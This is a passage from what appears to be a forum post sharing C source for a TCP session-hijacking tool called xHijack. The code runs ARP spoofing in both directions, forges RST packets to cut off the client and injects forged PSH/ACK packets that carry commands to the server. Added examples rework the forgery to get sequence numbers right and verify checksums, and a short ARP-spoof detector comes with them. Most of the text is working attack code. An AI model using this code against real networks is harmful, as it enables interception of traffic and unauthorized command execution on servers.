  PacketFreePacket(lpRecvPacket);
  return 0;
}

//
//Function: maintain the singly linked list that records every tracked connection.
//Returns the connection's ident, or 0 when nothing was found/added (or on delete).
//bDelete marks a matching node inactive; bAddNew creates (or recycles) a node
//when no active match exists.
//
DWORD CtrlConnInfoLink(DWORD dwServerIP, USHORT uServerPort, DWORD dwClientIP,
            USHORT uClientPort, BOOL bDelete, BOOL bAddNew)
{
  PCONNINFO  pNew, pTmp;

  pTmp = g_pConnHead;
  while(pTmp)
  {
    if(pTmp->bActive)
    {
      //found it
      if( (pTmp->dwServerIP == dwServerIP) &&
        (pTmp->uServerPort == uServerPort) &&
        (pTmp->dwClientIP == dwClientIP) &&
        (pTmp->uClientPort == uClientPort) )
      {
        if(bDelete)
        {
          pTmp->bActive = FALSE;
          return 0;
        }
        else return pTmp->ident;
      }
    }
    pTmp = pTmp->Next;
  }
  //not found, create new node
  if( (!pTmp) && (!bDelete) && (bAddNew) )
  {
    //search for an inactive node to recycle
    pTmp = g_pConnHead;
    while(pTmp)
    {
      if(!pTmp->bActive) break;
      pTmp = pTmp->Next;
    }
    //found an inactive node: reuse it (note that it keeps its previous ident)
    if(pTmp)
    {
      pTmp->dwServerIP = dwServerIP;
      pTmp->uServerPort = uServerPort;
      pTmp->dwClientIP = dwClientIP;
      pTmp->uClientPort = uClientPort;
      pTmp->bActive = TRUE;
      return pTmp->ident;
    }
    //none free, allocate a new node
    pNew = (PCONNINFO)malloc(sizeof(CONNINFO));
    if(!pNew)
    {
      printf("malloc for link node error:%d\n", GetLastError());
      return 0;
    }
    //fill the struct
    pNew->bActive = TRUE;
    pNew->dwServerIP = dwServerIP;
    pNew->uServerPort = uServerPort;
    pNew->dwClientIP = dwClientIP;
    pNew->uClientPort = uClientPort;
    pNew->ident = ++g_ident;
    pNew->Next = NULL;
    //append the new node to the list
    if(!g_pConnHead)
      g_pConnHead = g_pConnLast = pNew;
    else
    {
      g_pConnLast->Next = pNew;
      g_pConnLast = pNew;
    }
    return pNew->ident;
  }
  return 0;
}

//
//Function: return TRUE when ACK is the only TCP flag set (no FIN/SYN/RST/PSH/URG)
//
BOOL IsACKPacket(unsigned char flag)
{
  int  i, j=1;
  for(i=0 ; i<4; i++)//FIN, SYN, RST and PSH must all be clear
  {
    if(flag & j) return FALSE;
    j <<= 1;
  }
  if(!(flag & 0x10)) return FALSE;//ACK must be set
  if(flag & 0x20) return FALSE;//URG must be clear
  return TRUE;
}

//
//Function: send a data packet to the Server while posing as the Client.
//pTempletPacket is a captured client->server segment; its seq/ack are reused
//unchanged, so the caller must hand in a segment that carried no payload (see
//IsACKPacket), otherwise the injected data lands outside the server's window.
//
BOOL SendHiJackPacket(PTCPPACKET pTempletPacket)
{
  char    szBuff[1520];
  PSDHDR    psdhdr;
  PTCPPACKET  pHiJackPacket = NULL;
  BOOL    bRet = FALSE;
  size_t    cmdlen;

  __try
  {
    //check that a connection has been selected for control
    if(!g_pCurrCtrlConn) __leave;
    //the forged frame (54 bytes of headers + command + 4 bytes padding) must fit
    //the 1514-byte send buffer; this bound check is not in the original listing
    cmdlen = strlen(g_szCommand);
    if(sizeof(TCPPACKET) + cmdlen + 4 > 1514)
    {
      printf("command too long for a single frame\n");
      __leave;
    }
    //allocate memory for hijack packet
    pHiJackPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
    if(!pHiJackPacket)
    {
      printf("malloc error:%d\n", GetLastError());
      __leave;
    }
    memcpy(pHiJackPacket, pTempletPacket, sizeof(TCPPACKET));
    //-------------- modify the packet ---------------//
    //modify ethernet head: from our MAC to the server-side MAC (the server itself or its gateway)
    memcpy(pHiJackPacket->ehhdr.DestMAC, g_szServerSideMAC, 6);
    memcpy(pHiJackPacket->ehhdr.SourceMAC, g_szOwnMAC, 6);
    //modify ip head
    pHiJackPacket->iphdr.h_verlen = (4<<4 | sizeof(IPHDR)/sizeof(unsigned long));
    pHiJackPacket->iphdr.total_len = htons((USHORT)(sizeof(IPHDR)+sizeof(TCPHDR)+cmdlen));
    pHiJackPacket->iphdr.ident += 1;//bump the IP identification
    pHiJackPacket->iphdr.checksum = 0;
    pHiJackPacket->iphdr.sourceIP = g_pCurrCtrlConn->dwClientIP;//source IP: pose as the client
    pHiJackPacket->iphdr.destIP = g_pCurrCtrlConn->dwServerIP;//destination IP: receiver of the hijack packet
    //modify tcp head
    pHiJackPacket->tcphdr.th_sport = g_pCurrCtrlConn->uClientPort;//client's port
    pHiJackPacket->tcphdr.th_dport = g_pCurrCtrlConn->uServerPort;//server's port
    pHiJackPacket->tcphdr.th_lenres = (sizeof(TCPHDR)/4 << 4 | 0);
    pHiJackPacket->tcphdr.th_flag = 0x18;// PSH+ACK
    pHiJackPacket->tcphdr.th_sum = 0;
    pHiJackPacket->tcphdr.th_win = 0x3F44;
    //fill tcp pseudo header
    psdhdr.saddr = pHiJackPacket->iphdr.sourceIP;
    psdhdr.daddr = pHiJackPacket->iphdr.destIP;
    psdhdr.mbz = 0;
    psdhdr.ptcl = IPPROTO_TCP;
    psdhdr.tcpl = htons((USHORT)(sizeof(TCPHDR) + cmdlen));//tcp head + data len
    //calculate tcp checksum over pseudo header + tcp header + data
    memcpy(szBuff, &psdhdr, sizeof(PSDHDR));
    memcpy(szBuff + sizeof(PSDHDR), &pHiJackPacket->tcphdr, sizeof(TCPHDR));
    memcpy(szBuff + sizeof(PSDHDR) + sizeof(TCPHDR), g_szCommand, cmdlen);
    pHiJackPacket->tcphdr.th_sum = checksum((USHORT *)szBuff, (int)(sizeof(PSDHDR) + sizeof(TCPHDR) + cmdlen));
    //calculate IP checksum
    pHiJackPacket->iphdr.checksum = checksum((USHORT *)&pHiJackPacket->iphdr, sizeof(IPHDR));
    //fill send buffer
    memcpy(szBuff, (char *)pHiJackPacket, sizeof(TCPPACKET));
    memcpy(szBuff + sizeof(TCPPACKET), g_szCommand, cmdlen);
    memset(szBuff + sizeof(TCPPACKET) + cmdlen, 0, 4);
    memset(g_lpSendPacket->Buffer, 0, 1514);
    memcpy(g_lpSendPacket->Buffer, szBuff, sizeof(TCPPACKET) + cmdlen);
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
    {
      printf("Error sending the hijack packets!\n");
      __leave;
    }
    else printf("Send hijack packet ok!\n");
    bRet = TRUE;
  }
  __finally
  {
    if(pHiJackPacket) free(pHiJackPacket);
  }
  return bRet;
}

//
//Function: send a RST to the Client while posing as the Server.
//seq must be the sequence number the client expects next (the ack field of a
//captured client->server segment) or the client's TCP stack ignores the RST.
//
BOOL SendRstPacket(unsigned int seq, unsigned int ack)
{
  char    szBuff[60];
  PSDHDR    psdhdr;
  PTCPPACKET  pTcpPacket = NULL;
  BOOL    bRet = FALSE;

  __try
  {
    //check that a connection has been selected for control
    if(!g_pCurrCtrlConn) __leave;
    //allocate memory for rst packet
    pTcpPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
    if(!pTcpPacket)
    {
      printf("malloc error:%d\n", GetLastError());
      __leave;
    }
    //fill ethernet head: from our MAC to the client-side MAC (the client itself or its gateway)
    memcpy(pTcpPacket->ehhdr.DestMAC, g_szClientSideMAC, 6);
    memcpy(pTcpPacket->ehhdr.SourceMAC, g_szOwnMAC, 6);
    pTcpPacket->ehhdr.EthernetType = htons(EPT_IP);
    //fill ip head
    pTcpPacket->iphdr.h_verlen = (4<<4 | sizeof(IPHDR)/sizeof(unsigned long));
    pTcpPacket->iphdr.tos = 0;
    pTcpPacket->iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR));
    pTcpPacket->iphdr.ident = 1;
    pTcpPacket->iphdr.frag_and_flags = 0;
    pTcpPacket->iphdr.ttl = 128;
    pTcpPacket->iphdr.proto = IPPROTO_TCP;
    pTcpPacket->iphdr.checksum = 0;
    pTcpPacket->iphdr.sourceIP = g_pCurrCtrlConn->dwServerIP;//source IP: pose as the server
    pTcpPacket->iphdr.destIP = g_pCurrCtrlConn->dwClientIP;//ip address that receives this rst
    //fill tcp head
    pTcpPacket->tcphdr.th_sport = g_pCurrCtrlConn->uServerPort;//source port: pose as the server's port
    pTcpPacket->tcphdr.th_dport = g_pCurrCtrlConn->uClientPort;//port that receives this rst
    pTcpPacket->tcphdr.th_seq = seq;//SEQ (copied from the captured packet, already in network order)
    pTcpPacket->tcphdr.th_ack = ack;//ACK
    pTcpPacket->tcphdr.th_lenres = (sizeof(TCPHDR)/4<<4|0);
    pTcpPacket->tcphdr.th_flag = 4;//RST flag
    pTcpPacket->tcphdr.th_win = 0;
    pTcpPacket->tcphdr.th_urp = 0;
    pTcpPacket->tcphdr.th_sum = 0;
    //fill tcp pseudo header
    psdhdr.saddr = pTcpPacket->iphdr.sourceIP;
    psdhdr.daddr = pTcpPacket->iphdr.destIP;
    psdhdr.mbz = 0;
    psdhdr.ptcl = IPPROTO_TCP;
    psdhdr.tcpl = htons(sizeof(TCPHDR));
    //calculate tcp checksum over pseudo header + tcp header
    memcpy(szBuff, &psdhdr, sizeof(PSDHDR));
    memcpy(szBuff + sizeof(PSDHDR), &pTcpPacket->tcphdr, sizeof(TCPHDR));
    pTcpPacket->tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR));
    //calculate IP checksum
    pTcpPacket->iphdr.checksum = checksum((USHORT *)&pTcpPacket->iphdr, sizeof(IPHDR));
    //fill send buffer
    memset(g_lpSendPacket->Buffer, 0, 1514);
    memcpy(g_lpSendPacket->Buffer, (char *)pTcpPacket, sizeof(TCPPACKET));
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
    {
      printf("Error sending the rst packets!\n");
      __leave;
    }
    else printf("Send RST packet ok!\n");
    bRet = TRUE;
  }
  __finally
  {
    if(pTcpPacket) free(pTcpPacket);
  }
  return bRet;
}

//
//Function: Internet checksum (RFC 1071): one's-complement sum of 16-bit words,
//an odd trailing byte padded with zero, folded to 16 bits and complemented.
//Used for both the IP header and the TCP pseudo-header checksum above.
//
USHORT checksum(USHORT *buffer, int size)
{
  unsigned long cksum=0;
  while(size > 1) {
    cksum += *buffer++;
    size -= sizeof(USHORT);
  }
  if(size) {
    cksum += *(UCHAR*)buffer;
  }
  cksum = (cksum >> 16) + (cksum & 0xffff);
  cksum += (cksum >> 16);
  return (USHORT)(~cksum);
}

//
//Function: carry out the ARP spoofing
//1 tell ServerSide that ClientSide's mac is ownmac
//2 tell ClientSide that ServerSide's mac is ownmac
//One thread per direction; each resends its forged reply every second so the
//victim's ARP cache never recovers the real mapping.
//
DWORD WINAPI ArpSpoofThread(LPVOID lpType)
{
  int  iType = *(int *)lpType;
  ARPPACKET  ArpPacket;
  LPPACKET  lpArpPacket;
  char    szArpBuff[60];

  switch(iType)
  {
    case 1:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szServerSideMAC, 6);
      ArpPacket.arphdr.DestIP = g_ServerSideIP;
      ArpPacket.arphdr.SourceIP = g_ClientSideIP;
      break;
    case 2:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szClientSideMAC, 6);
      ArpPacket.arphdr.DestIP = g_ClientSideIP;
      ArpPacket.arphdr.SourceIP = g_ServerSideIP;
      break;
    default:
      return 0;
  }
  //ethernet head
  memcpy(ArpPacket.ehhdr.SourceMAC, g_szOwnMAC, 6);
  ArpPacket.ehhdr.EthernetType = htons(EPT_ARP);//ethernet type
  //arp head: the sender MAC is ours, the sender IP is the host we impersonate
  memcpy(ArpPacket.arphdr.DestMAC, ArpPacket.ehhdr.DestMAC, 6);//target's mac
  memcpy(ArpPacket.arphdr.SourceMAC, g_szOwnMAC, 6);//sender's mac
  ArpPacket.arphdr.HrdAddrlen = 6;
  ArpPacket.arphdr.ProAddrLen = 4;
  ArpPacket.arphdr.HrdType = htons(ARP_HARDWARE);
  ArpPacket.arphdr.ProType = htons(EPT_IP);
  ArpPacket.arphdr.op = htons(2);//arp reply

  lpArpPacket = PacketAllocatePacket();
  if(lpArpPacket == NULL)
  {
    printf("Error:failed to allocate the LPPACKET structure for Arp spoof.\n");
    return 0;
  }
  memset(szArpBuff, 0, sizeof(szArpBuff));
  memcpy(szArpBuff, (char *)&ArpPacket, sizeof(ARPPACKET));
  PacketInitPacket(lpArpPacket, szArpBuff, 60);
  //send the forged arp reply once a second, forever
  while(1)
  {
    if(PacketSendPacket(g_lpAdapter, lpArpPacket, TRUE) == FALSE)
    {
      printf("Error sending the arp spoof packets!\n");
      return 0;
    }
    Sleep(1000);
  }
  return 0;
}

//
//Function: resolve the MAC address for a given IP (used to learn the real
//ServerSide/ClientSide MACs before the spoofing starts)
//
BOOL GetMACAddr(DWORD DestIP, char *pMAC)
{
  DWORD  dwRet;
  ULONG  ulLen = 6, pulMac[2];
  dwRet = SendARP(DestIP, 0, pulMac, &ulLen);
  if(dwRet == NO_ERROR)
  {
    memcpy(pMAC, pulMac, 6);
    return TRUE;
  }
  else return FALSE;
}
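The three routines SendRstPacket, SendHiJackPacket and checksum above do the wire-level work of the hijack, but the listing reuses the captured segment's seq/ack verbatim and never verifies what it built. The block below is an added example, not code from xHijack or from eyas: it forges the same two segments (a RST "from the server" to the client, and a PSH/ACK "from the client" carrying the command to the server) with correct IPv4 and TCP checksums, derives their seq/ack from an observed client->server segment, and, going beyond the original, accounts for any payload or SYN/FIN that segment carried. It also includes the verification step a practitioner wants before sending anything: recompute both checksums over the finished packet. Ethernet framing and the actual send are omitted; all addresses, ports and sequence numbers are constructed test values.

```c
/* Added example: forge the RST and the command-injection segment of a TCP hijack
 * with correct checksums and seq/ack. Not xHijack code; all values are constructed.
 * Build: gcc -std=c99 -Wall hijack_forge.c */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#pragma pack(push, 1)
typedef struct { uint8_t ver_ihl, tos; uint16_t total_len, id, frag; uint8_t ttl, proto;
                 uint16_t csum; uint32_t src, dst; } ipv4_hdr;                      /* 20 bytes */
typedef struct { uint16_t sport, dport; uint32_t seq, ack; uint8_t off, flags;
                 uint16_t win, csum, urp; } tcp_hdr;                                 /* 20 bytes */
typedef struct { uint32_t src, dst; uint8_t zero, proto; uint16_t tcp_len; } pseudo_hdr; /* 12 */
#pragma pack(pop)

enum { TH_FIN = 0x01, TH_SYN = 0x02, TH_RST = 0x04, TH_PSH = 0x08, TH_ACK = 0x10 };
#define MAX_SEG 1500   /* largest IP packet we build (Ethernet MTU) */

/* byte-order helpers that do not depend on the host's endianness */
static uint16_t be16(uint16_t v) { uint8_t b[2] = { (uint8_t)(v >> 8), (uint8_t)v }; uint16_t r; memcpy(&r, b, 2); return r; }
static uint32_t be32(uint32_t v) { uint8_t b[4] = { (uint8_t)(v >> 24), (uint8_t)(v >> 16), (uint8_t)(v >> 8), (uint8_t)v }; uint32_t r; memcpy(&r, b, 4); return r; }
static uint32_t from_be32(uint32_t n) { uint8_t b[4]; memcpy(b, &n, 4); return ((uint32_t)b[0] << 24) | ((uint32_t)b[1] << 16) | ((uint32_t)b[2] << 8) | b[3]; }

/* RFC 1071 one's-complement sum over big-endian 16-bit words, odd byte zero-padded.
 * Run over data that already contains its checksum it returns 0 (used to verify). */
static uint16_t csum16(const void *data, size_t len)
{
    const uint8_t *p = data; uint32_t sum = 0;
    for (; len > 1; len -= 2, p += 2) sum += (uint32_t)((p[0] << 8) | p[1]);
    if (len) sum += (uint32_t)(p[0] << 8);
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Write IPv4+TCP(+payload) into out. Addresses, ports, seq and ack are host order.
 * Returns the total length, or 0 if the segment would not fit in MAX_SEG. */
static size_t build_segment(uint8_t *out, uint32_t src, uint32_t dst, uint16_t sport, uint16_t dport,
                            uint32_t seq, uint32_t ack, uint8_t flags, const uint8_t *payload, size_t plen)
{
    size_t tcp_len = sizeof(tcp_hdr) + plen, total = sizeof(ipv4_hdr) + tcp_len;
    uint8_t scratch[sizeof(pseudo_hdr) + MAX_SEG];
    ipv4_hdr ip = {0}; tcp_hdr tcp = {0}; pseudo_hdr ph; uint16_t c;
    if (total > MAX_SEG) return 0;
    ip.ver_ihl = 0x45; ip.ttl = 128; ip.proto = 6; ip.id = be16(1);
    ip.total_len = be16((uint16_t)total); ip.src = be32(src); ip.dst = be32(dst);
    tcp.sport = be16(sport); tcp.dport = be16(dport); tcp.seq = be32(seq); tcp.ack = be32(ack);
    tcp.off = (uint8_t)((sizeof(tcp_hdr) / 4) << 4); tcp.flags = flags;
    tcp.win = be16((flags & TH_RST) ? 0 : 16384);
    /* TCP checksum covers pseudo-header + TCP header + payload; a result of 0 is sent as 0xffff */
    ph.src = ip.src; ph.dst = ip.dst; ph.zero = 0; ph.proto = 6; ph.tcp_len = be16((uint16_t)tcp_len);
    memcpy(scratch, &ph, sizeof ph);
    memcpy(scratch + sizeof ph, &tcp, sizeof tcp);
    if (plen) memcpy(scratch + sizeof ph + sizeof tcp, payload, plen);
    c = csum16(scratch, sizeof ph + tcp_len);
    tcp.csum = be16(c ? c : 0xffff);
    ip.csum = be16(csum16(&ip, sizeof ip));
    memcpy(out, &ip, sizeof ip);
    memcpy(out + sizeof ip, &tcp, sizeof tcp);
    if (plen) memcpy(out + sizeof ip + sizeof tcp, payload, plen);
    return total;
}

/* Recompute both checksums over a finished segment; 1 if both verify, else 0. */
static int segment_checksums_ok(const uint8_t *seg, size_t len)
{
    uint8_t scratch[sizeof(pseudo_hdr) + MAX_SEG];
    ipv4_hdr ip; pseudo_hdr ph; size_t tcp_len;
    if (len < sizeof(ipv4_hdr) + sizeof(tcp_hdr) || len > MAX_SEG) return 0;
    memcpy(&ip, seg, sizeof ip);
    if (csum16(seg, sizeof ip) != 0) return 0;
    tcp_len = len - sizeof ip;
    ph.src = ip.src; ph.dst = ip.dst; ph.zero = 0; ph.proto = 6; ph.tcp_len = be16((uint16_t)tcp_len);
    memcpy(scratch, &ph, sizeof ph);
    memcpy(scratch + sizeof ph, seg + sizeof ip, tcp_len);
    return csum16(scratch, sizeof ph + tcp_len) == 0;
}

/* A captured client->server segment, as the sniffer thread would see it (host order). */
typedef struct { uint32_t cip, sip; uint16_t cport, sport; uint32_t seq, ack, len; uint8_t flags; } observed;

/* The server's next expected byte: seq plus the data carried, plus one if SYN or FIN
 * consumed a sequence number. xHijack skips this by requiring a payload-free template. */
static uint32_t next_client_seq(const observed *o)
{
    return o->seq + o->len + ((o->flags & (TH_SYN | TH_FIN)) ? 1u : 0u);
}

/* SendRstPacket's job: RST "from the server" whose seq is the client's own ack value,
 * i.e. exactly what the client expects next, so its stack accepts the reset. */
static size_t forge_rst_to_client(uint8_t *out, const observed *o)
{
    return build_segment(out, o->sip, o->cip, o->sport, o->cport,
                         o->ack, next_client_seq(o), TH_RST | TH_ACK, NULL, 0);
}

/* SendHiJackPacket's job: PSH/ACK "from the client" carrying cmd at the server's next expected seq. */
static size_t forge_command_to_server(uint8_t *out, const observed *o, const char *cmd)
{
    return build_segment(out, o->cip, o->sip, o->cport, o->sport,
                         next_client_seq(o), o->ack, TH_PSH | TH_ACK, (const uint8_t *)cmd, strlen(cmd));
}

/* field accessors for the demo and tests (offsets: seq at +4, ack at +8, flags at +13 of TCP) */
static uint32_t seg_seq(const uint8_t *seg)   { uint32_t v; memcpy(&v, seg + sizeof(ipv4_hdr) + 4, 4); return from_be32(v); }
static uint32_t seg_ack(const uint8_t *seg)   { uint32_t v; memcpy(&v, seg + sizeof(ipv4_hdr) + 8, 4); return from_be32(v); }
static uint8_t  seg_flags(const uint8_t *seg) { return seg[sizeof(ipv4_hdr) + 13]; }

int main(void)
{
    /* constructed: client 192.168.0.3:1025 talking to server 192.168.0.2:23; the client's
       last segment carried 7 bytes starting at seq 1000 and acknowledged 5000 */
    observed o = { 0xC0A80003u, 0xC0A80002u, 1025, 23, 1000, 5000, 7, TH_PSH | TH_ACK };
    uint8_t seg[MAX_SEG];
    size_t n = forge_rst_to_client(seg, &o);
    printf("RST to client: %u bytes seq=%u ack=%u checksums %s\n", (unsigned)n, (unsigned)seg_seq(seg),
           (unsigned)seg_ack(seg), segment_checksums_ok(seg, n) ? "ok" : "BAD");
    n = forge_command_to_server(seg, &o, "echo hijacked\r\n");
    printf("cmd to server: %u bytes seq=%u ack=%u checksums %s\n", (unsigned)n, (unsigned)seg_seq(seg),
           (unsigned)seg_ack(seg), segment_checksums_ok(seg, n) ? "ok" : "BAD");
    return 0;
}
```

The RST carries the ACK flag here, whereas SendRstPacket sends a bare RST; both are accepted by the client because what matters is that the RST's sequence number sits at the client's receive-window edge. Note that the injected command's seq comes from next_client_seq, not from the template's seq, which is what lets this work on an observed segment that carried data.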
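ArpSpoofThread above relies on the victim accepting an unsolicited ARP reply and overwriting its cache entry, which is also exactly what makes the attack detectable. The block below is an added example, not part of xHijack: it builds the same Ethernet+ARP reply as a raw 42-byte frame, for both directions the tool uses (server told the client's IP is at our MAC, and the reverse), and adds the defender-side check the original has no counterpart for: compare the reply's sender MAC against a pinned IP-to-MAC table, the way a static ARP entry or arpwatch would. All MAC and IP addresses are constructed.

```c
/* Added example: the unsolicited ARP reply ArpSpoofThread sends, as a raw frame, plus
 * a detector that flags it against pinned IP->MAC bindings. Not xHijack code; all
 * addresses are constructed. Build: gcc -std=c99 -Wall arp_spoof_frame.c */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#pragma pack(push, 1)
typedef struct {
    uint8_t  dst[6], src[6]; uint16_t type;                      /* Ethernet II header   */
    uint16_t htype, ptype; uint8_t hlen, plen; uint16_t op;      /* ARP header ...       */
    uint8_t  sha[6]; uint32_t spa; uint8_t tha[6]; uint32_t tpa; /* ... and addresses    */
} eth_arp;                                                        /* 42 bytes on the wire */
#pragma pack(pop)

/* byte-order helpers independent of host endianness */
static uint16_t be16(uint16_t v) { uint8_t b[2] = { (uint8_t)(v >> 8), (uint8_t)v }; uint16_t r; memcpy(&r, b, 2); return r; }
static uint32_t be32(uint32_t v) { uint8_t b[4] = { (uint8_t)(v >> 24), (uint8_t)(v >> 16), (uint8_t)(v >> 8), (uint8_t)v }; uint32_t r; memcpy(&r, b, 4); return r; }
static uint32_t from_be32(uint32_t n) { uint8_t b[4]; memcpy(b, &n, 4); return ((uint32_t)b[0] << 24) | ((uint32_t)b[1] << 16) | ((uint32_t)b[2] << 8) | b[3]; }

/* The frame ArpSpoofThread repeats every second: an ARP reply addressed to victim_mac
 * claiming "spoofed_ip is at own_mac". Returns the frame length (42). */
static size_t build_arp_spoof(uint8_t *out, const uint8_t own_mac[6],
                              const uint8_t victim_mac[6], uint32_t victim_ip, uint32_t spoofed_ip)
{
    eth_arp f;
    memcpy(f.dst, victim_mac, 6); memcpy(f.src, own_mac, 6); f.type = be16(0x0806);
    f.htype = be16(1); f.ptype = be16(0x0800); f.hlen = 6; f.plen = 4; f.op = be16(2);
    memcpy(f.sha, own_mac, 6); f.spa = be32(spoofed_ip);   /* the lie: our MAC for their IP */
    memcpy(f.tha, victim_mac, 6); f.tpa = be32(victim_ip);
    memcpy(out, &f, sizeof f);
    return sizeof f;   /* the driver pads this to the 60-byte Ethernet minimum, as xHijack does by hand */
}

/* Defender side: a pinned IP->MAC binding (static ARP entry / arpwatch database). */
typedef struct { uint32_t ip; uint8_t mac[6]; } pin;

/* 1 if frame is an ARP reply whose sender IP is pinned to a different MAC (the
 * signature of the attack above); 0 if consistent, not an ARP reply, unknown IP or truncated. */
static int arp_reply_conflicts(const uint8_t *frame, size_t len, const pin *table, size_t n)
{
    eth_arp f; uint32_t spa; size_t i;
    if (len < sizeof f) return 0;
    memcpy(&f, frame, sizeof f);
    if (f.type != be16(0x0806) || f.op != be16(2)) return 0;
    spa = from_be32(f.spa);
    for (i = 0; i < n; i++)
        if (table[i].ip == spa) return memcmp(table[i].mac, f.sha, 6) != 0;
    return 0;
}

int main(void)
{
    /* constructed addresses: attacker MAC, server 192.168.0.2, client 192.168.0.3 */
    const uint8_t own[6]    = {0x00,0x0c,0x29,0xaa,0xbb,0xcc};
    const uint8_t server[6] = {0x00,0x50,0x56,0x44,0x55,0x66};
    const uint8_t client[6] = {0x00,0x50,0x56,0x11,0x22,0x33};
    const pin pinned[2] = { {0xC0A80002u, {0x00,0x50,0x56,0x44,0x55,0x66}},
                            {0xC0A80003u, {0x00,0x50,0x56,0x11,0x22,0x33}} };
    uint8_t f1[64], f2[64];
    /* type 1: tell the server that the client's IP is at our MAC; type 2: the reverse */
    size_t n1 = build_arp_spoof(f1, own, server, 0xC0A80002u, 0xC0A80003u);
    size_t n2 = build_arp_spoof(f2, own, client, 0xC0A80003u, 0xC0A80002u);
    printf("to server: %u bytes, conflicts with pinned table: %d\n", (unsigned)n1, arp_reply_conflicts(f1, n1, pinned, 2));
    printf("to client: %u bytes, conflicts with pinned table: %d\n", (unsigned)n2, arp_reply_conflicts(f2, n2, pinned, 2));
    return 0;
}
```

The detector only compares against pinned entries, so a host it has never seen is not reported; in practice the table is seeded from the first reply observed for each IP and a later change is the alert. Static ARP entries on the server and client (or switch-side dynamic ARP inspection) stop the cache from being overwritten in the first place.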
Author: wy617958197    Time: 2014-9-4 20:48
Impressive work, master!



